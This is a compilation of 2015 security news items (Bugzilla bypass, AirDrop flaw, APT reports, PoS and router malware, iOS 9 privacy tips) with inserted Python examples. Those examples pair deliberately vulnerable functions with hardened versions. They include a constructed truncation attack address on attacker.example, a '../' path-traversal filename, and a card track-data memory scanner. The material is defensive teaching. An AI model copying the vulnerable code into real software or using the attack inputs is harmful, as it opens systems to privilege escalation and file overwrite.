"This vulnerability has been tested and found working on – the Bugzilla for the Mozilla Foundation. Upon successful exploitation of the vulnerability we were granted permissions that would have potentially allowed us to view confidential data (see screen capture below)," states the post.

At the time of writing, there is no information on whether the Bugzilla vulnerability has been exploited in the wild to gain access to non-public vulnerabilities.
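Both Bugzilla articles on this page describe the bypass only as tricking the system into believing the attacker belongs to a privileged email domain. As an added example (a model written for this page, not Bugzilla's Perl code), the following shows the general failure such a bug falls under: the address is validated, and the confirmation mail sent, using the full string, but the copy that is stored and later used for the domain-based permission decision is silently truncated to the width of its database column. The fixed Bugzilla releases reject login names longer than 127 characters, which register_hardened reproduces; the validation regex, the 255-character column width and the domain-to-group rule are assumptions of the model.

```python
import re

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")   # assumed validator
PRIVILEGED_DOMAINS = {"mozilla.org"}                    # assumed domain-to-group rule
COLUMN_WIDTH = 255                                      # assumed width of the login column

def groups_for(login_name):
    # Domain-based grant: a login ending in a privileged domain gets that domain's group.
    if "@" not in login_name:
        return set()
    domain = login_name.rsplit("@", 1)[1]
    return {"domain:" + domain} if domain in PRIVILEGED_DOMAINS else set()

def register_vulnerable(email):
    """Returns (address the confirmation mail goes to, stored login, granted groups)."""
    if not EMAIL_RE.match(email):
        raise ValueError("invalid address")
    mailed_to = email                    # full string: validated and used for the mail
    stored = email[:COLUMN_WIDTH]        # silently cut to the column width on insert
    return mailed_to, stored, groups_for(stored)

def register_hardened(email, max_len=127):
    if not EMAIL_RE.match(email):
        raise ValueError("invalid address")
    if len(email) > max_len:             # nothing can be truncated later
        raise ValueError("login name too long")
    return email, email, groups_for(email)   # one string for mail, storage and decision

def hardened_rejects(email):
    try:
        register_hardened(email)
    except ValueError:
        return True
    return False

def attacker_address():
    # Constructed: exactly COLUMN_WIDTH characters ending in "@mozilla.org", then a
    # suffix that makes the real mail domain an attacker-controlled subdomain
    # (mozilla.org.attacker.example), so the confirmation mail still reaches the attacker.
    head = "a" * (COLUMN_WIDTH - len("@mozilla.org")) + "@mozilla.org"
    return head + ".attacker.example"
```

The general lesson is that any check derived from an identifier (here, the domain) must run on the exact bytes that were verified and stored; a length cap at the input boundary is the simplest way to guarantee that no later layer changes them.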

Microsoft links its identity management services to Google and Facebook

18 September 2015, Security
Microsoft is extending Azure Active Directory, its identity management and access control service for on-premises and cloud applications. It has now connected the service to the popular Google suite of applications, and to Facebook as well.

According to Gartner, Azure AD is a leading product used by companies to authenticate employee identities. According to Microsoft's own figures, around six million customers currently use it.

That is also why the company decided to extend it, so that businesses can verify the identities not only of their employees but also of their customers and business partners.

"Providing a secure identity platform whose functionality also builds on the applications customers already like is a fundamental step for keeping their trust, satisfaction and loyalty," says Microsoft vice president Brad Anderson in the blog post announcing the news.

As an example he cites the collaboration with football giant Real Madrid, which is testing the new service on its products. Its fans can now sign in to the club's mobile applications using their Facebook login.

Microsoft also announced what it calls Active Directory B2B Collaboration, an extension that lets companies verify the identities of their business partners.

"With these new capabilities, companies can easily build trust and relationships between Azure AD users, so they can conveniently share business applications across organizations without having to set up additional shared directories or keep managing partner identities," Anderson adds.

Both new features are already available, although Microsoft has not announced exact pricing. It is expected to scale with usage, that is, with the number of identities managed.

A dangerous silent AirDrop attack is threatening Apple users

A new vulnerability in the AirDrop service could be exploited by attackers to silently infect iPhones and Macs.
All iOS versions before the newly released iOS 9 are affected by a serious AirDrop bug that could be exploited to take full control of an iPhone or Mac.

The AirDrop bug was disclosed by the Australian security researcher Mark Dowd. AirDrop is a proprietary service for transferring documents between supported Macintosh computers and iOS devices.

The bug allows anyone within AirDrop range of a user to silently plant malware on the targeted device by sending it a file; the sequence ends with a reboot of the target. The vulnerability affects every iOS version with AirDrop support, from iOS 7 onwards, as well as Mac OS X from Yosemite onwards.


The main problem for Apple users is that an attacker can exploit the AirDrop bug even if the victim rejects the incoming file.
After the device reboots, the attacker's provisioning profile is in place and SpringBoard, Apple's software for managing the iOS home screen, has been altered so that the bogus application's "enterprise" certificate is treated as already trusted by the user, which gives the malicious app the rights it asked for.

These rights include access to:

and many more…
With access to such features of the phone, the attacker can fully compromise the victim's device.

Below a video PoC of the AirDrop bug exploitation published by Dowd, the video shows an attack on an iPhone running iOS 8.4.1.


The AirDrop bug is fixed in iOS 9, which runs the AirDrop service in a sandbox that stops an attacker from writing files to arbitrary locations on the device.
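Both AirDrop articles on this page describe the flaw as the receiver writing an incoming file to a location outside the directory it should use. As an added example, not Dowd's exploit and not Apple's AirDrop code, here is a model of a file receiver that trusts the sender-supplied name beside one that does not; the inbox directory, the file name and the target path are constructed for the example. The hardened version also handles a symlink pre-planted inside the inbox, which a check on the name string alone would miss.

```python
import os
import tempfile

def save_received_file_vulnerable(inbox, name, data):
    # Trusts the sender-supplied name, so "../" segments walk out of the inbox.
    dest = os.path.join(inbox, name)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as f:
        f.write(data)
    return dest

def save_received_file_hardened(inbox, name, data):
    # Reject anything that is not a plain file name, then confirm the resolved
    # destination (symlinks followed) is still directly inside the inbox.
    if name in ("", ".", "..") or "/" in name or "\\" in name or "\0" in name:
        raise ValueError("invalid file name: %r" % name)
    inbox_real = os.path.realpath(inbox)
    dest = os.path.realpath(os.path.join(inbox_real, name))
    if os.path.dirname(dest) != inbox_real:
        raise ValueError("destination escapes inbox: %r" % dest)
    with open(dest, "wb") as f:
        f.write(data)
    return dest

def demo():
    """Returns (vulnerable_escaped, hardened_blocked_traversal, hardened_blocked_symlink)."""
    root = tempfile.mkdtemp()
    inbox = os.path.join(root, "inbox")
    os.makedirs(inbox)
    inbox_real = os.path.realpath(inbox)
    # Constructed hostile transfer: a name that climbs out of the inbox into a
    # hypothetical profile directory.
    hostile = "../Profiles/evil.mobileconfig"
    written = save_received_file_vulnerable(inbox, hostile, b"payload")
    escaped = not os.path.realpath(written).startswith(inbox_real + os.sep)
    try:
        save_received_file_hardened(inbox, hostile, b"payload")
        blocked = False
    except ValueError:
        blocked = True
    # Second trick: a symlink already inside the inbox that points outside it.
    os.symlink(os.path.join(root, "outside.txt"), os.path.join(inbox, "link"))
    try:
        save_received_file_hardened(inbox, "link", b"payload")
        symlink_blocked = False
    except ValueError:
        symlink_blocked = True
    # A plain name still works with the hardened receiver.
    ok = save_received_file_hardened(inbox, "photo.jpg", b"jpeg bytes")
    return escaped, blocked, symlink_blocked, os.path.dirname(ok) == inbox_real
```

Resolving with realpath before the containment check is what catches the symlink case; comparing the unresolved join against the inbox prefix would pass it.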

Apple users are urged to update to iOS 9 and OS X El Capitan, which are about to be released.

Operation Iron Tiger, hackers target US Defense Contractors

Experts at Trend Micro have uncovered Operation Iron Tiger, a cyber espionage campaign run by China-based hackers against United States defense contractors.
The threat actors behind Operation Iron Tiger stole vast amounts of data from US defense contractors: intellectual property, emails, strategic planning documents and other highly confidential information that could be used to destabilize an organization.

The experts speculate that the Iron Tiger Operation was carried out by the China-based group dubbed “Emissary Panda.”

“Operation Iron Tiger is a targeted attack campaign discovered to have stolen trillions of data from defense contractors in the US, including stolen emails, intellectual property, strategic planning documents—data and records that could be used to destabilize an organization.” states a blog post published by Trend Micro.


In August 2015, researchers at Dell discovered that the Emissary Panda group used watering hole attacks as its attack vector, compromising websites popular with a target organization's personnel.

Emissary Panda (also known as TG-3390) targeted high-profile governments and organisations, searching for information on defence aerospace projects.

The group has been active since at least 2010, targeting organizations in APAC, but since 2013 it has been attacking high-technology targets in the US.

The experts consider Emissary Panda a "highly competent and sophisticated group"; Trend Micro revealed that it has seen the group steal up to 58 GB of data from a single target.

“The Iron Tiger actors can be skilled computer security experts but sparingly used advanced techniques, given their weakly protected target networks. They do not follow a specific schedule when it came to launching attacks. Instead, they prioritize attacks based on a list of chosen targets.” state the experts.
The attackers used spear-phishing emails to carry out the attacks; the experts at Trend Micro analyzed in detail the accounts used by the hackers and the composition of the email messages (i.e. subject, language, message).

Trend Micro published a detailed report on Operation Iron Tiger; the investigation allowed the experts to analyze the TTPs (Tactics, Techniques and Procedures) of the threat actor.

Below are the key findings of the report:

The group’s use of exclusive hacking tools and malware, such as dnstunserver, PlugX and Gh0st, to name a few
The threat actor group’s use of public resources such as Blogspot™ and the Google Cloud Platform™
The group patched one of their compromised servers to avoid being hacked
Key identification elements leading to at least one individual physically located in China
The use of code-signing certificates of Korea-based security company SoftCamp Co., Ltd.
The group’s list of targets, which include military defense contractors, intelligence agencies, FBI-based partners, and the US government
Their use of a unique method to intercept Microsoft Exchange credentials

The DUKES APT – 7 years of Russian state sponsored hacking


F-Secure has published an interesting report on the cyber espionage operations conducted by the Dukes APT group, which appears linked to the Kremlin.
Security researchers at F-Secure have published an interesting report detailing the cyber espionage operations of a Russian APT group dubbed the Dukes; the experts speculate that the group is backed by the Russian government. The Dukes group has been active since at least 2008, targeting governments, political think tanks and many other organizations, including criminal organizations operating in the Russian Federation.

The hacking crew is very sophisticated; its operations leverage "zero-day" exploits developed by its members.

“The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making,” states the executive summary of the report. “The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen terrorism; and Russian speakers engaged in the illicit trade of controlled substances and drugs.”

The Dukes group is responsible for a large number of highly sophisticated campaigns; security experts have detected an impressive number of malware toolsets in its arsenal, including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke.

The first known targets of the Dukes were associated with the Chechen separatist movement; the hackers used the PinchDuke malware to compromise the victims' systems, but a few months later, in 2009, experts collected evidence of the Dukes' involvement in cyber attacks against Western governments and organizations.


The researchers at F-Secure have collected much evidence that suggests the Russian origin of the Dukes group; the sophistication of their malware and the nature of the targets point to the involvement of the Russian government. All the targeted organizations manage information of interest to the Russian government. In April 2014, researchers at F-Secure analyzed a number of decoy documents referring to political issues such as the crisis in Ukraine or NATO-related material, used in an attempt to deceive the victims. F-Secure reported, for example, the existence of a bogus document signed by Ruslan Demchenko, the First Deputy Minister for Foreign Affairs of Ukraine.


The source code analyzed by F-Secure contains a number of Russian-language artifacts; in one case the researchers also found an error message that supports the attribution. GeminiDuke also used timestamps set to Moscow Standard Time.

In the PinchDuke malware the researchers discovered the following message:

“Ошибка названия модуля! Название секции данных должно быть 4 байта!” (which translates essentially as “Error in the name of the module! Title data section must be at least 4 bytes!”).

“the benefactors of the Dukes is so powerful and so tightly connected to the group that the Dukes are able to operate with no apparent fear of repercussions on getting caught. We believe the only benefactor with the power to offer such comprehensive protection would be the government of the nation from which the group operates. We therefore believe the Dukes to work either within or directly for a government, thus ruling out the possibility of a criminal gang or another third party” states the report published by F-Secure.

The experts at F-Secure seem to have no doubt about the abilities of the Dukes group and its well-coordinated organization, which benefits from extraordinary financial resources.

“We therefore believe the Dukes to be a single, large, well-coordinated organization with clear separation of responsibilities and targets.”

Take a look at the report “THE DUKES: 7 years of Russian cyberespionage”; I found it really amazing and full of precious information.


Security issues in DHS systems potentially expose confidential data to risk


Although DHS components have strengthened coordination in performing their cyber missions, a recent audit by the OIG has found several security issues.
Among the missions assigned to the DHS is the coordination of activities related to the prevention of, mitigation of and recovery from cyber incidents; the Department also oversees the IT security of the US Government.

The DHS is supported in these critical activities by three components: US Immigration and Customs Enforcement (ICE), the National Protection and Programs Directorate (NPPD), and the United States Secret Service (USSS).

Close collaboration between these components is crucial to ensure homeland security.


After this premise, let me show you the results of a report released on Tuesday by the Department of Homeland Security’s Office of Inspector General (OIG). The audit, conducted by the OIG, called for improved coordination between DHS components in order to meet cyber threats and avoid serious cyber incidents.

According to the report “DHS Can Strengthen Its Cyber Mission Coordination Efforts” published by the OIG, DHS and the above components have taken significant steps to improve information sharing and to respond to cyber attacks effectively.

However, the OIG discovered several security issues related to a lack of coordination with existing policies and to the organization of a Department-wide cyber training program.

Without a department-wide training program, internal staff are not able to correctly perform their assigned incident response duties or investigative responsibilities in the event of a cyber incident.

“Despite these positive steps, the Department can take additional actions to improve its cyber mission coordination. For example, CIR has not developed a cyber strategic implementation plan due to its recent establishment and limited staff. Without a strategic plan, DHS cannot effectively align the components’ cyber responsibilities and capabilities with DHS’ overall mission.” states the report.

“Further, DHS needs to establish a cyber training program to provide its analysts and investigators with the skills needed to effectively perform their duties at ICE, NPPD, and USSS. An automated cyber information sharing tool is needed to enhance coordination among the components. Moreover, deficiencies we identified in ICE and USSS’ implementation of DHS baseline configuration settings, vulnerability management, weakness remediation, and specialized security training as required may result in loss, misuse, modification, and unauthorized access of the Department’s information systems and data.”

The OIG also discovered a number of vulnerabilities affecting the internal websites of ICE and USSS. The flaws include cross-site scripting (XSS), cross-site request forgery (CSRF), information leakage, session fixation, and command injection flaws.

ICE failed to implement configuration settings on Cyber Crimes Center (C3) servers and workstations, exposing sensitive data to the risk of cyber attacks.

The OIG has already reported the flaws to the components; some of the security issues discovered in the audit had already been resolved, but the OIG is still not completely satisfied with the results obtained by the components and their IT staff.

MWZLesson POS Trojan borrows code from other malware

Security experts at Doctor Web have discovered a new PoS Trojan dubbed MWZLesson that borrows code from other popular malicious software.
Security experts at Dr. Web have discovered a new PoS Trojan that was designed by mixing code from other malware.

The new PoS Trojan, dubbed Trojan.MWZLesson, was designed by reusing the code of other popular malware, including the Dexter PoS malware and the Neutrino backdoor.

“This code was borrowed from another Trojan designed for POS terminals and named Trojan.PWS.Dexter. The malware sends all acquired bank card data and other intercepted information to the command and control server.” states the blog post published by Dr. Web.


Like its predecessors, MWZLesson compromises POS terminals, scraping RAM in search of credit card data. Once it has infected the PoS system, the malware communicates with its server over the HTTP protocol: it steals card data and sends it to the command and control server through GET and POST requests.
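
What a RAM scraper actually looks for in memory is magnetic-stripe track data, and the same search can be run by defenders over a memory dump of a PoS process to confirm whether cleartext card numbers are exposed there (a PCI DSS concern). The following is an added example, not code from Dr. Web or from the page: a scanner for track-2 records that uses the Luhn check to discard look-alike digit runs and returns only masked PANs. The memory buffer is constructed, and the card numbers are standard test numbers.

```python
"""
Added example (not code from Dr. Web or the page): scanning a memory buffer for
cleartext payment-card track-2 data, the search a RAM-scraping PoS Trojan
performs, used here from the defender's side to verify whether a PoS process
exposes cleartext card numbers in memory.
The sample buffer below is constructed; the card numbers are standard test
numbers, not real accounts.
"""
import re

# Track-2 layout: ;PAN=YYMM<service code><discretionary data>?
# The PAN is 13-19 digits. The regex is deliberately loose; the Luhn check
# below weeds out false positives such as timestamps and counters.
TRACK2_RE = re.compile(rb";?(\d{13,19})=(\d{4})(\d{3})(\d*)\??")

def luhn_ok(pan: str) -> bool:
    """Return True when the digit string passes the Luhn mod-10 check."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = ord(ch) - 48
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def mask_pan(pan: str) -> str:
    """Keep only the first six and last four digits (PCI DSS masking rule)."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]

def scan_buffer(buf: bytes) -> list[dict]:
    """Find Luhn-valid track-2 records in a byte buffer; PANs are returned masked."""
    findings = []
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if not luhn_ok(pan):
            continue
        findings.append({
            "offset": m.start(),
            "pan": mask_pan(pan),
            "expiry": m.group(2).decode(),       # YYMM
            "service_code": m.group(3).decode(),
        })
    return findings

# Constructed sample: a fake process memory region with one valid track-2
# record, one Luhn-invalid decoy, and unrelated digit runs.
SAMPLE_MEMORY = (
    b"POS v3.1 started 20150917120000\x00"
    b";4111111111111111=25121010000000000000?\x00"   # Visa test PAN, Luhn-valid
    b";4111111111111112=25121010000000000000?\x00"   # one digit off: fails Luhn
    b"txn-id 1234567890123456789 ok\x00"
)

if __name__ == "__main__":
    for finding in scan_buffer(SAMPLE_MEMORY):
        print(finding)
```

Run against a dump of a PoS process (for instance with `scan_buffer(open(path, "rb").read())`), any finding means the terminal holds card data in cleartext at that point of processing, which is exactly the window a scraper like MWZLesson exploits; the remediation is point-to-point encryption at the card reader, not a better scanner.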

“Trojan.MWZLesson can intercept GET and POST requests sent from the infected machine’s browsers (Firefox, Chrome or Internet Explorer). Such requests are forwarded to the command and control server run by cybercriminals.” continues the post.
Trojan.MWZLesson can update itself, download and run additional files, find specific documents, and even mount an HTTP Flood attack.

The experts at Dr.Web discovered that Trojan.MWZLesson also implements features to avoid detection and to eradicate other malware that has infected the PoS system.

“Trojan.MWZLesson checks for virtual environments and debuggers and gathers information on the infected machine. The newly discovered PoS malware is able to remove other malware present on the machine and is able to exfiltrate different kinds of data.”

The discovery of Trojan.MWZLesson confirms the great interest of criminal crews in infecting POS terminals, and their ability to recycle code from older, effective malware.

The Differences between Targeted Attacks and Advanced Persistent Threats

Although Advanced Persistent Threats and Targeted Attacks are often confused, at their core they are two different things in the field of online security. Most businesses need only worry about one of these two types of attacks, while focusing their efforts on remaining thoroughly protected against all enemies and threats.
Many people get confused over the terminology of online threats, such as Targeted Attacks and APTs (short for Advanced Persistent Threats). However, when it comes to comparing these two, there is nothing that should confuse you. On the contrary, the differences are substantial, and this is what we are going to highlight in this article.

First of all, when we talk about Advanced Persistent Threats, we generally refer to targeted attacks carried out by nations and states. This means that these attacks have been meticulously designed and programmed to do what they were supposed to. There are developers (most likely lots of them) working behind Advanced Persistent Threats. So their design is impeccable most of the time and the results are pre-determined: no room for mistakes, in a scenario of intelligence agencies aiming to do harm and gain access to sensitive data.

The cost is high, as you can imagine: with such preparation and so many brilliant minds building something, the chances are that the outcome will be brilliant, too!

On the contrary, Targeted Attacks are the most common threats that most businesses and individuals encounter. They are not designed by intelligence agencies and they do not require such a great budget. There is no single goal behind these attacks, as the people behind them may seek to gain access to credit card credentials, just cause mayhem, get their hands on personal information for blackmail, and so on.


Even if it suits the media and advertising campaigns to confuse people and put both of these threats (meaning Advanced Persistent Threats and Targeted Attacks) under the same veil of mystery, this is not the case. Instead, the former is not something for people to lose sleep over; the latter is what they should be focusing on.

The truth behind this confusion has to do with the aim of IT security departments and cybersecurity companies to find excuses for not fighting off threats. If the enemy is regarded as gigantic (with the funds and the power of nations and agencies), failure is much easier to cope with. However, everybody needs to understand that each threat can prove a handful, and there needs to be a prudent strategy and dedication for dealing with it.

Written by: Ali Qamar, Founder/Chief Editor at

Author Bio:
Ali Qamar is an Internet security research enthusiast who enjoys “deep” research to dig out modern discoveries in the security industry. He is the founder and chief editor at Security Gladiators, an ultimate source for cyber security. To be frank and honest, Ali started working online as a freelancer and still shares his knowledge for a living. He is passionate about sharing knowledge with people, and always tries to give only the best. Follow Ali on Twitter @AliQammar57

How to Detect IE Zero-day Exploit Used to Deploy Korplug Malware

Recently, Microsoft issued an emergency patch for a zero-day vulnerability in Internet Explorer that is being exploited to deploy Korplug malware on vulnerable PCs.
Korplug, a known variant of PlugX, is a Trojan that creates a backdoor used for information stealing on infected computers.
In one of the most publicized cases, an evangelical church in Hong Kong was compromised to deliver the malware. Attackers were able to breach the church’s website and inject a malicious iFrame overlay designed to look like the site itself.
The iFrame was then used to redirect visitors to a site hosting the IE exploit. Once users land on the website, they are served a java.html which installs Korplug on their computers.
To defend against Korplug, system administrators and security engineers should educate users of corporate assets about these types of hacking techniques.
In many cases, organizations are breached because of the lack of internal education around how to identify threats.
All too often breaches are successful when users execute malicious email attachments, download files from suspicious websites, or install cracked software.
However, even with the right kind of education, users will still sometimes inadvertently compromise company assets.
This usually occurs when a user accidentally exposes the network to a piece of malware posing as a legitimate spreadsheet, word doc in an email, or in the case of the evangelical church described above, an iFrame designed to look like a page in a website.
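
The church-website compromise above turns on a single injected iframe that the visitor never sees. Site owners can catch that kind of injection by checking their own pages for iframes that are hidden or point off-site. The following is an added example, not code from AlienVault or from the page: a small scanner over a constructed HTML page; the hostnames church.example and exploit.example are placeholders.

```python
"""
Added example, not from AlienVault or the page: flag injected iframes of the
kind used in the church-website compromise. An iframe is suspicious when it
points to a host other than the site's own and/or is hidden from the visitor
(zero size, display:none, visibility:hidden, positioned far off-screen).
The HTML below is constructed; the hostnames are placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}",
    re.I,
)

class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))

def is_hidden(attrs: dict) -> bool:
    """True when the iframe would be invisible to the visitor."""
    for dim in ("width", "height"):
        v = (attrs.get(dim) or "").strip().rstrip("px")
        if v.isdigit() and int(v) == 0:
            return True
    return bool(HIDDEN_STYLE.search(attrs.get("style") or ""))

def find_suspicious_iframes(html: str, site_host: str) -> list[dict]:
    """Return iframes that are external to site_host or hidden, with reasons."""
    parser = IframeCollector()
    parser.feed(html)
    results = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or site_host   # relative src: same host
        reasons = []
        if host.lower() != site_host.lower():
            reasons.append("external:" + host)
        if is_hidden(attrs):
            reasons.append("hidden")
        if reasons:
            results.append({"src": src, "reasons": reasons})
    return results

# Constructed page: one legitimate embed, one injected hidden iframe.
SAMPLE_HTML = """
<html><body>
<h1>Welcome</h1>
<iframe src="/sermons/player.html" width="400" height="300"></iframe>
<iframe src="http://exploit.example/java.html" width="0" height="0"
        style="visibility:hidden;position:absolute;left:-9999px"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_suspicious_iframes(SAMPLE_HTML, "church.example"):
        print(hit)
```

Fetching each page of a site periodically and diffing the output of this check against a known-good baseline gives an early warning of exactly the kind of defacement-for-delivery described above, well before the IDS signatures for the payload fire on a victim.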
Impact on You
Acting like a backdoor, malware like Korplug can be used by an attacker to have complete control over a user’s computer.
This allows the attacker to escalate privileges, exfiltrate data from the user’s machine, or use it as a pivot point to access more sensitive systems.
How AlienVault Can Help
AlienVault Unified Security Management (USM) provides asset discovery, threat detection (IDS), vulnerability assessment, behavioral monitoring and SIEM in a single console, plus weekly threat intelligence updates developed by the AlienVault Labs threat research team.
The Labs team has released IDS signatures and a correlation rule to the AlienVault USM platform so customers can identify activity related to Korplug.

SYNful Knock: Backdoor Malware Found in Cisco Routers


Mandiant, a FireEye sister company, has been involved in research related to cyber defense.
In its recent findings, a backdoor named SYNful Knock was identified compromising Cisco routers, its defining feature being a lasting effect, i.e. serious persistence.
What? – The malicious program is implanted in the router illicitly through the device’s firmware (regardless of the vendor). This is achieved by modifying the router's firmware image, so the implant survives even after the device reboots.
How? – By installing SYNful Knock in Cisco 1841, Cisco 2811 and Cisco 3825 routers.
Affected areas – 14 instances in 4 countries: India, Mexico, Ukraine, and the Philippines.
Impact – the backdoor has abilities that can compromise the availability of other hosts and give access to sensitive data in an organization.
“The theoretical nature of router-focused attacks created a mindset within our industry to focus on building more walls around the perimeter, leaving many organizations exposed when it comes to foundational devices like routers,” stated FireEye.
With this statement, we can imagine how dangerous this backdoor is!
As the implant is created by modifying the Cisco Internetwork Operating System (IOS) image, it activates the following capabilities on the compromised Cisco device:
It allows the attacker to install various functional modules from the anonymity of the internet.
It provides unrestricted access using a wrapped backdoor password.
It delivers modules via the HTTP protocol and not HTTPS.
The controller (attacker) sends TCP packets with a non-standard sequence number and corresponding acknowledgment numbers.
The modules are disguised as independent executable code or hooks within the router’s IOS with functionality similar to the backdoor password.
The backdoor password provides access to the router through the console and Telnet.
Also, The Hacker News (THN) reported on vulnerabilities in Belkin routers leading to privilege escalation and attacks such as man-in-the-middle. This is considered an evident example of routers being compromised on a large scale.
Besides this, a document describing how Cisco’s IOS can be compromised and, side by side, how it can be protected against malware can be seen here.
To get insights into this stealthy malware, visit the step-by-step demonstration published by Mandiant.

World's 9 Biggest Banks to adopt Bitcoin's Blockchain Technology
Nine of the World’s renowned Banks, including JPMorgan, Royal Bank of Scotland, Goldman Sachs and Barclays, are collaborating with New York-based financial tech firm R3 to create a new framework based on Bitcoin’s Blockchain.
Yes, they are back in the game yet again, but this time officially!
Blockchain, the public and decentralized ledger technology that underpins all Bitcoin transactions, has now been recognized as “the future for financial services infrastructure”.
Blockchain technology is a way of keeping records by listing the owner’s name with all the previous and present transactions the client was involved in. It is a public ledger in which a list of all the transactions ever executed is maintained.
The banks are planning to develop and implement blockchain-like technology in which distributed/shared ledger standards are going to replace (for the better, of course) the current ledger transactions.
The idea behind such an initiative is to maintain financial records securely without any central authority by adopting decentralized blockchain technology.
The potential benefits of blockchain technology to banking institutions are almost innumerable; for example, this innovation is considered safer and more secure than the conventional methods currently in use.
The banks teaming up are:
JP Morgan
Commonwealth Bank of Australia
Goldman Sachs
Royal Bank of Scotland
Credit Suisse
State Street
Blockchain has tremendous potential to revolutionize the transaction systems used by Banks.
Blockchain is Revolutionary, Not the Bitcoins!
After this news, it seems that for banks blockchain technology is considered good, but Bitcoin is still a “NO”.
"These new technologies could transform how financial transactions are recorded, reconciled and reported – all with additional security, lower error rates and significant cost reductions," said Hu Liang, Senior Vice President and Head of Emerging Technologies at State Street.
Further Liang said, "R3 has the people and approach to driving this effort and increase the likelihood of successfully advancing the new technology in the financial industry."
The current rate of 1 Bitcoin (BTC) equals $230 (USD); in the recent past bitcoins were tagged as an illegal currency, and whoever was found with the digital currency faced severe prosecution.
The inoperability of Bitcoin was due to its use in illegal activities and to its being the prime suspect in triggering various cyber attacks.
This new alliance of banks will change the face of many financial activities, as the adopted Bitcoin technology is supposed to save time and money while also being more secure.
By taking the blockchain feature of Bitcoin, the banks are going to prepare a separate standard. Therefore, they must bring this feature to the world only after a strict testing process.

For Better Privacy & Security, Change these iOS 9 Settings Immediately
The new iOS is better, faster, and more efficient than its predecessors, with a number of new features and improvements including enhanced multitasking for iPad, Proactive Assistant Siri, new Low Power mode, Transit directions in Maps and many more.
You need to download iOS 9 right away. But, after installing it on your iOS device, you should immediately change these security settings to protect your privacy.
Besides various new features, iOS 9 also comes with a handful of security and privacy improvements.
So, before doing anything like loading new apps, customizing your phone, or syncing your data, you need to check these settings and, if necessary, change them.
1. Locking the Door
Boost iOS 9 Security by Setting a Longer 6-digit Passcode
When you set up an iOS device, you are asked to create a passcode to encrypt your entire iPhone or iPad storage. The passcode is your device key that protects your device and its data from others.
This passcode used to be limited to just four digits, but iOS 9 adds the ability to use a 6-digit passcode, which makes your iPhone or iPad far more secure.
If you have already set a passcode on your device, go to Settings > Touch ID & Passcode and enter your existing 4-digit passcode.
If not, go to Settings > Touch ID & Passcode, select Turn Passcode On, and select Passcode Options. This gives you the choice of a Custom Alphanumeric Code, a Custom Numeric Code, or the older Four-Digit Numeric Code.
2. Disable Tracking
Limit Certain Apps from Tracking your Location in the Background
Some applications, such as those that tell you the weather, or Apple's Maps, actually need your location data, obtained from your iOS device's GPS and/or Wi-Fi.
But what about apps such as Facebook that use your location in the background, even when you are not actively using the app?
Today everybody is interested in tracking you: your location, your activities, everything about you. So you need to turn off location services for these apps in your device's settings.
If you see these kinds of pop-ups and other notifications from an app, the app wants to use your location. For perfect privacy, select Don't Allow, and do this whenever asked by different apps. This will limit some of an app's functions.
3. Search with Do-Not-Track Service
Change your Search Setting to DuckDuckGo
Google's Chrome, Microsoft's Bing and Yahoo have all been accused of tracking users, but the search engine DuckDuckGo, available since iOS 8, is known for not tracking its users, their keystrokes, or their entries.
To enable it, go to Settings > Safari > Search Engine and select DuckDuckGo as your default search engine for Siri, Safari, and other apps.
4. Don't let Apps take over your Personal Data
Prevent Apps from Uploading your Data
Contacts, Calendar, Reminders, Emails, and Photos are among the most personal things for everyone. If an app wants this type of information, either for processing or for uploading, it will ask you the first time.
For perfect privacy, you can change the access of each app manually by going to Settings > Privacy, selecting a category, and switching the button ON or OFF depending on which third-party apps you want to give access to.
Remember: if you have already given an app access to your personal data, switching the service OFF doesn't solve the problem. The service will not delete your data; for that you’ll have to contact the specific app maker.
5. Add an Extra Layer of Security
Enable Fingerprint Security with Touch ID
You can enable Fingerprints and Thumbprints to secure your iPhone or iPad.
To enable it, go to Settings > Touch ID & Passcode and enroll your fingerprint or thumbprint. However, make sure that you have enabled the Phone Unlock setting.
6. Enable 'Find My iPhone'
Keep a Tight Grip on your iPhone or iPad in case you Lose it
Find My iPhone locates your device on a map if it's lost or stolen.
To enable it, go to Settings > iCloud > Find My iPhone (or iPad) and switch it ON. You may be required to enter your device's passcode to authorize this.
Moreover, you can also select Send Last Location; this will send your device's last location to Apple's servers just before your device powers down.
Note: in case you don’t want Apple to track you, we advise you to disable this feature.
7. Make your Purchases Secure
Require password with every app purchase
For financial security, ensure that every app purchase requires your Apple ID password or your fingerprint, to prevent multiple purchases being made on your payment card after a single authorization.
You’ll be shown the above prompt; select Always Require.
8. Change Your Default Wi-Fi Hotspot Password
Close the Doors for Outsiders Stealing Away your Internet
Although iOS 9 comes with a stronger default password for your Personal Hotspot, it is good practice to change the default password to an even stronger one.
You are advised to include letters, numbers, as well as special characters in your password to make it difficult for others to crack.
9. Stay Away, Advertisers!
Limit advertisers tracking your location, data
Safari also got a small makeover in iOS 9 with even more privacy-related tweaks. One such new privacy setting is blocking advertising cookies and trackers.
Go to Settings > Privacy > Advertising and then enable the Limit Ad Tracking option. From here, tap the Reset Advertising Identifier option, and then accept any prompts.
You can also prevent iPhone location-based tracking, as some services track you for location-based advertisements and alerts, and for boosting your cell coverage.
Just head to Settings > Privacy > Location Services > System Services and select the services that you wish to disable.

Coinvault, are we reaching the end of the nightmare?

